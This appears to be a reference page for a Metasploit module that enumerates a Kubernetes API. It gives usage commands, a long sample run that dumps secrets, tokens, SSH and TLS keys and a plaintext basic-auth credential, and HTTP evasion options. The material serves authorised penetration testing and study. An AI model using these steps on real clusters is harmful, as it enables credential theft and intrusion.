Kubernetes Enumeration - Metasploit
This page contains detailed information about how to use the auxiliary/cloud/kubernetes/enum_kubernetes metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Kubernetes Enumeration
Module: auxiliary/cloud/kubernetes/enum_kubernetes
Source code: modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb
Disclosure date: -
Last modification time: 2021-10-07 12:35:53 +0000
Supported architecture(s): -
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -
Enumerate a Kubernetes API to report useful resources such as available namespaces, pods, secrets, etc. Useful resources will be highlighted using the HIGHLIGHT_NAME_PATTERN option.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/cloud/kubernetes/enum_kubernetes
msf auxiliary(enum_kubernetes) > show targets
... a list of targets ...
msf auxiliary(enum_kubernetes) > set TARGET target-id
msf auxiliary(enum_kubernetes) > show options
... show and set options ...
msf auxiliary(enum_kubernetes) > exploit
Knowledge Base
Vulnerable Application
Description
Enumerates a Kubernetes cluster.
Verification Steps
Create or acquire the credentials
- Start msfconsole
- Do:
use auxiliary/cloud/kubernetes/enum_kubernetes - Set the required options
- Do:
run5: You should see the enumerated resources from the Kubernetes API.
Options
SESSION
An optional session to use for configuration. When specified, the values of NAMESPACE, TOKEN, RHOSTS and RPORT
will be gathered from the session host. This requires that the session be on an existing Kubernetes pod. The necessary
values may not always be present.
Setting this option will also automatically route connections through the specified session.
TOKEN
The JWT token. The token with the necessary privileges to access the exec endpoint within a running pod and optionally create a new pod.
POD
The pod name to execute in. When not specified, a new pod will be created with an entrypoint that allows it to run forever. After creation, the pod will be used to execute the payload. The created pod is not automatically cleaned up. A note containing the created pod's information will be added to the database when it is connected.
NAMESPACE
The Kubernetes namespace that the TOKEN has permissions for and that POD either exists in or should be created in.
NAMESPACE_LIST
The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces
HIGHLIGHT_NAME_PATTERN
A PCRE regex of resource names to highlight.
OUTPUT
Output format, allowed values are: table, json
Scenarios
Run all enumeration
Explicitly setting RHOST and TOKEN to enumerate all available namespaces, and associated resources:
msf6 > use cloud/kubernetes/enum_kubernetes
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
RHOST => https://kubernetes.docker.internal:6443
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciO...
TOKEN => eyJhbGciO...
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run
[*] Running module against 127.0.0.1
[+] Kubernetes service version: {"major":"1","minor":"21","gitVersion":"v1.21.2","gitCommit":"092fbfbf53427de67cac1e9fa54aaa09a28371d7","gitTreeState":"clean","buildDate":"2021-06-16T12:53:14Z","goVersion":"go1.16.5","compiler":"gc","platform":"linux/amd64"}
[+] Enumerating namespaces
Namespaces
==========
# name
- ----
0 default
1 kube-node-lease
2 kube-public
3 kube-system
4 kubernetes-dashboard
[+] Namespace 0: default
Auth (namespace: default)
=========================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: default)
=========================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 default a4bg7r Running iyxz0ujfck9t (image: vulhub/thinkphp:5.0.23) 10.1.1.51
1 default appjokbpiiml Running iggapn (image: vulhub/thinkphp:5.0.23) 10.1.1.57
2 default cvyf4m9le Running t0e93vcuyi (image: vulhub/thinkphp:5.0.23) 10.1.1.53
3 default fh4bfdtf Running dygvv (image: vulhub/thinkphp:5.0.23) 10.1.1.52
4 default gavp Running jfwdaei (image: vulhub/thinkphp:5.0.23) 10.1.1.58
5 default mkfkuwd6hkd1 Running aoavh (image: vulhub/thinkphp:5.0.23) 10.1.1.62
6 default nid7jd Running geb (image: vulhub/thinkphp:5.0.23) 10.1.1.45
7 default redis-7fd956df5-sbchb Running redis (image: redis:5.0.4 TCP:6379) 10.1.1.56
8 default thinkphp-67f7c88cc9-djg6q Running thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80) 10.1.1.55
9 default thinkphp-67f7c88cc9-l56mg Running thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80) 10.1.1.44
10 default usuuucs Running xfcw (image: vulhub/thinkphp:5.0.23) 10.1.1.50
11 default v2xxl7z Running nu3s (image: vulhub/thinkphp:5.0.23) 10.1.1.61
12 default yulfpaohsepk Running jjmxkkzgkmy (image: vulhub/thinkphp:5.0.23) 10.1.1.47
Secrets (namespace: default)
============================
# namespace name type data age
- --------- ---- ---- ---- ---
0 default default-token-btlkb kubernetes.io/service-account-token ca.crt,namespace,token 8d
1 default local-registry kubernetes.io/dockerconfigjson .dockerconfigjson 7d15h
2 default secret-basic-auth kubernetes.io/basic-auth password,username 8d
3 default secret-empty Opaque 8d
4 default secret-id-ed25519-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 7d15h
5 default secret-id-ed25519-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 7d15h
6 default secret-id-rsa-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 8d
7 default secret-id-rsa-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 8d
8 default secret-tls kubernetes.io/tls tls.crt,tls.key 8d
[+] service token default-token-btlkb: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_257374.bin
[+] dockerconfig json local-registry: /Users/user/.msf4/loot/20211006105714_default_unknown_docker.json_543280.bin
[+] basic_auth secret-basic-auth: admin:password213
[+] ssh_key secret-id-ed25519-with-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_861231.txt
[+] ssh_key secret-id-ed25519-without-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_095417.txt
[+] ssh_key secret-id-rsa-with-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_246326.txt
[+] ssh_key secret-id-rsa-without-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_429821.txt
[+] tls_key secret-tls: /Users/user/.msf4/loot/20211006105714_default_unknown_tls.key_651137.txt
[+] tls_cert secret-tls: /Users/user/.msf4/loot/20211006105714_default_unknown_tls.cert_025932.txt (/CN=example.com)
[+] Namespace 1: kube-node-lease
Auth (namespace: kube-node-lease)
=================================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-node-lease)
=================================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-node-lease)
====================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-node-lease default-token-54967 kubernetes.io/service-account-token ca.crt,namespace,token 19d
[+] service token default-token-54967: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_727718.bin
[+] Namespace 2: kube-public
Auth (namespace: kube-public)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-public)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-public)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-public default-token-2r2s4 kubernetes.io/service-account-token ca.crt,namespace,token 19d
[+] service token default-token-2r2s4: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_198155.bin
[+] Namespace 3: kube-system
Auth (namespace: kube-system)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-system)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 kube-system coredns-558bd4d5db-2fspm Running coredns (image: k8s.gcr.io/coredns/coredns:v1.8.0 UDP:53,TCP:53,TCP:9153) 10.1.1.48
1 kube-system coredns-558bd4d5db-zx7k5 Running coredns (image: k8s.gcr.io/coredns/coredns:v1.8.0 UDP:53,TCP:53,TCP:9153) 10.1.1.59
2 kube-system etcd-docker-desktop Running etcd (image: k8s.gcr.io/etcd:3.4.13-0) 192.168.65.4
3 kube-system kube-apiserver-docker-desktop Running kube-apiserver (image: k8s.gcr.io/kube-apiserver:v1.21.2) 192.168.65.4
4 kube-system kube-controller-manager-docker-desktop Running kube-controller-manager (image: k8s.gcr.io/kube-controller-manager:v1.21.2) 192.168.65.4
5 kube-system kube-proxy-tvgm2 Running kube-proxy (image: k8s.gcr.io/kube-proxy:v1.21.2) 192.168.65.4
6 kube-system kube-scheduler-docker-desktop Running kube-scheduler (image: k8s.gcr.io/kube-scheduler:v1.21.2) 192.168.65.4
7 kube-system storage-provisioner Running storage-provisioner (image: docker/desktop-storage-provisioner:v2.0) 10.1.1.49
8 kube-system vpnkit-controller Running vpnkit-controller (image: docker/desktop-vpnkit-controller:v2.0) 10.1.1.54
Secrets (namespace: kube-system)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-system attachdetach-controller-token-4tnpl kubernetes.io/service-account-token ca.crt,namespace,token 19d
1 kube-system bootstrap-signer-token-kqgwd kubernetes.io/service-account-token ca.crt,namespace,token 19d
2 kube-system certificate-controller-token-g2lcs kubernetes.io/service-account-token ca.crt,namespace,token 19d
3 kube-system clusterrole-aggregation-controller-token-9kh9j kubernetes.io/service-account-token ca.crt,namespace,token 19d
4 kube-system coredns-token-xjv86 kubernetes.io/service-account-token ca.crt,namespace,token 19d
5 kube-system cronjob-controller-token-wddp5 kubernetes.io/service-account-token ca.crt,namespace,token 19d
6 kube-system daemon-set-controller-token-7w2wt kubernetes.io/service-account-token ca.crt,namespace,token 19d
7 kube-system default-token-hq24x kubernetes.io/service-account-token ca.crt,namespace,token 19d
8 kube-system deployment-controller-token-bf8ks kubernetes.io/service-account-token ca.crt,namespace,token 19d
9 kube-system disruption-controller-token-j4mlp kubernetes.io/service-account-token ca.crt,namespace,token 19d
10 kube-system endpoint-controller-token-sqdg2 kubernetes.io/service-account-token ca.crt,namespace,token 19d
11 kube-system endpointslice-controller-token-wr2v9 kubernetes.io/service-account-token ca.crt,namespace,token 19d
12 kube-system endpointslicemirroring-controller-token-4lqdn kubernetes.io/service-account-token ca.crt,namespace,token 19d
13 kube-system ephemeral-volume-controller-token-67k95 kubernetes.io/service-account-token ca.crt,namespace,token 19d
14 kube-system expand-controller-token-cmfwt kubernetes.io/service-account-token ca.crt,namespace,token 19d
15 kube-system generic-garbage-collector-token-sxdc8 kubernetes.io/service-account-token ca.crt,namespace,token 19d
16 kube-system horizontal-pod-autoscaler-token-267qc kubernetes.io/service-account-token ca.crt,namespace,token 19d
17 kube-system job-controller-token-hzv9p kubernetes.io/service-account-token ca.crt,namespace,token 19d
18 kube-system kube-proxy-token-cqw2h kubernetes.io/service-account-token ca.crt,namespace,token 19d
19 kube-system namespace-controller-token-cldm6 kubernetes.io/service-account-token ca.crt,namespace,token 19d
20 kube-system node-controller-token-tjtk5 kubernetes.io/service-account-token ca.crt,namespace,token 19d
21 kube-system persistent-volume-binder-token-2n7jx kubernetes.io/service-account-token ca.crt,namespace,token 19d
22 kube-system pod-garbage-collector-token-vgzrz kubernetes.io/service-account-token ca.crt,namespace,token 19d
23 kube-system pv-protection-controller-token-5jvqn kubernetes.io/service-account-token ca.crt,namespace,token 19d
24 kube-system pvc-protection-controller-token-jg5sn kubernetes.io/service-account-token ca.crt,namespace,token 19d
25 kube-system replicaset-controller-token-zvblz kubernetes.io/service-account-token ca.crt,namespace,token 19d
26 kube-system replication-controller-token-tcj4p kubernetes.io/service-account-token ca.crt,namespace,token 19d
27 kube-system resourcequota-controller-token-q5nsg kubernetes.io/service-account-token ca.crt,namespace,token 19d
28 kube-system root-ca-cert-publisher-token-ghh92 kubernetes.io/service-account-token ca.crt,namespace,token 19d
29 kube-system service-account-controller-token-ljxn7 kubernetes.io/service-account-token ca.crt,namespace,token 19d
30 kube-system service-controller-token-dg8ks kubernetes.io/service-account-token ca.crt,namespace,token 19d
31 kube-system statefulset-controller-token-dcx8k kubernetes.io/service-account-token ca.crt,namespace,token 19d
32 kube-system storage-provisioner-token-52m2w kubernetes.io/service-account-token ca.crt,namespace,token 19d
33 kube-system token-cleaner-token-lc8jh kubernetes.io/service-account-token ca.crt,namespace,token 19d
34 kube-system ttl-after-finished-controller-token-qkv66 kubernetes.io/service-account-token ca.crt,namespace,token 19d
35 kube-system ttl-controller-token-rw6zq kubernetes.io/service-account-token ca.crt,namespace,token 19d
36 kube-system vpnkit-controller-token-l9ljz kubernetes.io/service-account-token ca.crt,namespace,token 19d
[+] service token attachdetach-controller-token-4tnpl: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_443806.bin
[+] service token bootstrap-signer-token-kqgwd: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_334381.bin
[+] service token certificate-controller-token-g2lcs: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_780446.bin
[+] service token clusterrole-aggregation-controller-token-9kh9j: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_695659.bin
[+] service token coredns-token-xjv86: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_035400.bin
[+] service token cronjob-controller-token-wddp5: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_256456.bin
[+] service token daemon-set-controller-token-7w2wt: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_370856.bin
[+] service token default-token-hq24x: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_167584.bin
[+] service token deployment-controller-token-bf8ks: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_668044.bin
[+] service token disruption-controller-token-j4mlp: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_025629.bin
[+] service token endpoint-controller-token-sqdg2: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_952597.bin
[+] service token endpointslice-controller-token-wr2v9: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_454535.bin
[+] service token endpointslicemirroring-controller-token-4lqdn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_573333.bin
[+] service token ephemeral-volume-controller-token-67k95: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_791145.bin
[+] service token expand-controller-token-cmfwt: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_350984.bin
[+] service token generic-garbage-collector-token-sxdc8: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_095555.bin
[+] service token horizontal-pod-autoscaler-token-267qc: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_696872.bin
[+] service token job-controller-token-hzv9p: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_709657.bin
[+] service token kube-proxy-token-cqw2h: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_148992.bin
[+] service token namespace-controller-token-cldm6: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_138901.bin
[+] service token node-controller-token-tjtk5: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_113414.bin
[+] service token persistent-volume-binder-token-2n7jx: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_154991.bin
[+] service token pod-garbage-collector-token-vgzrz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_413568.bin
[+] service token pv-protection-controller-token-5jvqn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_233791.bin
[+] service token pvc-protection-controller-token-jg5sn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_468067.bin
[+] service token replicaset-controller-token-zvblz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_821269.bin
[+] service token replication-controller-token-tcj4p: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_210131.bin
[+] service token resourcequota-controller-token-q5nsg: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_510682.bin
[+] service token root-ca-cert-publisher-token-ghh92: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_341707.bin
[+] service token service-account-controller-token-ljxn7: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_242421.bin
[+] service token service-controller-token-dg8ks: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_231000.bin
[+] service token statefulset-controller-token-dcx8k: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_346820.bin
[+] service token storage-provisioner-token-52m2w: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_889808.bin
[+] service token token-cleaner-token-lc8jh: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_071179.bin
[+] service token ttl-after-finished-controller-token-qkv66: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_155663.bin
[+] service token ttl-controller-token-rw6zq: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_730592.bin
[+] service token vpnkit-controller-token-l9ljz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_693223.bin
[+] Namespace 4: kubernetes-dashboard
Auth (namespace: kubernetes-dashboard)
======================================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kubernetes-dashboard)
======================================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 kubernetes-dashboard dashboard-metrics-scraper-856586f554-c2pz5 Running dashboard-metrics-scraper (image: kubernetesui/metrics-scraper:v1.0.6 TCP:8000) 10.1.1.60
1 kubernetes-dashboard kubernetes-dashboard-67484c44f6-4hh4j Running kubernetes-dashboard (image: kubernetesui/dashboard:v2.3.1 TCP:8443) 10.1.1.46
Secrets (namespace: kubernetes-dashboard)
=========================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kubernetes-dashboard default-token-6gwtz kubernetes.io/service-account-token ca.crt,namespace,token 19d
1 kubernetes-dashboard kubernetes-dashboard-certs Opaque 19d
2 kubernetes-dashboard kubernetes-dashboard-csrf Opaque csrf 19d
3 kubernetes-dashboard kubernetes-dashboard-key-holder Opaque priv,pub 19d
4 kubernetes-dashboard kubernetes-dashboard-token-gfhhr kubernetes.io/service-account-token ca.crt,namespace,token 19d
[+] service token default-token-6gwtz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_854995.bin
[+] service token kubernetes-dashboard-token-gfhhr: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_729795.bin
[*] Auxiliary module execution completed
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >
Using actions
See available actions:
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions
Auxiliary actions:
Name Description
---- -----------
all enumerate all resources
auth enumerate auth
namespace enumerate namespace
namespaces enumerate namespaces
pod enumerate pod
pods enumerate pods
secret enumerate secret
secrets enumerate secrets
version enumerate version
Enumerate pods:
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pods
[*] Running module against 127.0.0.1
Pods (namespace: default)
# namespace name status containers ip
0 default a4bg7r Running iyxz0ujfck9t (image: vulhub/thinkphp:5.0.23) 10.1.1.51 1 default appjokbpiiml Running iggapn (image: vulhub/thinkphp:5.0.23) 10.1.1.57 2 default cvyf4m9le Running t0e93vcuyi (image: vulhub/thinkphp:5.0.23) 10.1.1.53 3 default fh4bfdtf Running dygvv (image: vulhub/thinkphp:5.0.23) 10.1.1.52 4 default gavp Running jfwdaei (image: vulhub/thinkphp:5.0.23) 10.1.1.58 5 default mkfkuwd6hkd1 Running aoavh (image: vulhub/thinkphp:5.0.23) 10.1.1.62 6 default nid7jd Running geb (image: vulhub/thinkphp:5.0.23) 10.1.1.45 7 default redis-7fd956df5-sbchb Running redis (image: redis:5.0.4 TCP:6379) 10.1.1.56 8 default thinkphp-67f7c88cc9-djg6q Running thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80) 10.1.1.55 9 default thinkphp-67f7c88cc9-l56mg Running thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80) 10.1.1.44 10 default usuuucs Running xfcw (image: vulhub/thinkphp:5.0.23) 10.1.1.50 11 default v2xxl7z Running nu3s (image: vulhub/thinkphp:5.0.23) 10.1.1.61 12 default yulfpaohsepk Running jjmxkkzgkmy (image: vulhub/thinkphp:5.0.23) 10.1.1.47
[*] Auxiliary module execution completed
Enumerate a pod with a specified namespace, name:
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pod namespace=default name=redis-7fd956df5-sbchb
[*] Running module against 127.0.0.1
Pods (namespace: default)
=========================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 default redis-7fd956df5-sbchb Running redis (image: redis:5.0.4 TCP:6379) 10.1.1.56
[*] Auxiliary module execution completed
Enumerate a pod with a specified namespace, name, and outputting the result as JSON:
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > pod namespace=default name=redis-7fd956df5-sbchb output=json
[*] Running module against 127.0.0.1
[
{
"kind": "Pod",
"apiVersion": "v1",
"metadata": {
"name": "redis-7fd956df5-sbchb",
"generateName": "redis-7fd956df5-",
"namespace": "default",
"uid": "0f00c08c-bdb1-4206-94ce-5c447cd2d446",
"resourceVersion": "629723",
"creationTimestamp": "2021-09-16T22:33:33Z",
"labels": {
"app": "redis",
"pod-template-hash": "7fd956df5",
"role": "leader",
"tier": "backend"
},
},
... etc ...
}
]
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the cloud/kubernetes/enum_kubernetes auxiliary module looks in the msfconsole:
msf6 > use auxiliary/cloud/kubernetes/enum_kubernetes
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show info
Name: Kubernetes Enumeration
Module: auxiliary/cloud/kubernetes/enum_kubernetes
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
alanfoster
Spencer McIntyre
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Available actions:
Name Description
---- -----------
all enumerate all resources
auth enumerate auth
namespace enumerate namespace
namespaces enumerate namespaces
pod enumerate pod
pods enumerate pods
secret enumerate secret
secrets enumerate secrets
version enumerate version
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HIGHLIGHT_NAME_PATTERN username|password|user|pass yes PCRE regex of resource names to highlight
NAME no The name of the resource to enumerate
NAMESPACE default no The Kubernetes namespace
NAMESPACE_LIST default,dev,staging,production,kube-public,kube-no no The default namespace list to iterate when the current token does not have the permission to r
de-lease,kube-lease,kube-system etrieve the available namespaces
OUTPUT table yes output format to use (Accepted: table, json)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS no The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT no The target port (TCP)
SESSION no An optional session to use for configuration
SSL true no Negotiate SSL/TLS for outgoing connections
TOKEN no Kubernetes API token
VHOST no HTTP server virtual host
Description:
Enumerate a Kubernetes API to report useful resources such as
available namespaces, pods, secrets, etc. Useful resources will be
highlighted using the HIGHLIGHT_NAME_PATTERN option.
Module Options
This is a complete list of options available in the cloud/kubernetes/enum_kubernetes auxiliary module:
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show options
Module options (auxiliary/cloud/kubernetes/enum_kubernetes):
Name Current Setting Required Description
---- --------------- -------- -----------
HIGHLIGHT_NAME_PATTERN username|password|user|pass yes PCRE regex of resource names to highlight
NAME no The name of the resource to enumerate
NAMESPACE default no The Kubernetes namespace
NAMESPACE_LIST default,dev,staging,production,kube-public,kube-no no The default namespace list to iterate when the current token does not have the permission to
de-lease,kube-lease,kube-system retrieve the available namespaces
OUTPUT table yes output format to use (Accepted: table, json)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS no The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT no The target port (TCP)
SESSION no An optional session to use for configuration
SSL true no Negotiate SSL/TLS for outgoing connections
TOKEN no Kubernetes API token
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
all enumerate all resources
Advanced Options
Here is a complete list of advanced options supported by the cloud/kubernetes/enum_kubernetes auxiliary module:
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show advanced
Module advanced options (auxiliary/cloud/kubernetes/enum_kubernetes):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: A
uto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the cloud/kubernetes/enum_kubernetes module can do:
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show actions
Auxiliary actions:
Name Description
---- -----------
all enumerate all resources
auth enumerate auth
namespace enumerate namespace
namespaces enumerate namespaces
pod enumerate pod
pods enumerate pods
secret enumerate secret
secrets enumerate secrets
version enumerate version
Evasion Options
Here is the full list of possible evasion options supported by the cloud/kubernetes/enum_kubernetes auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
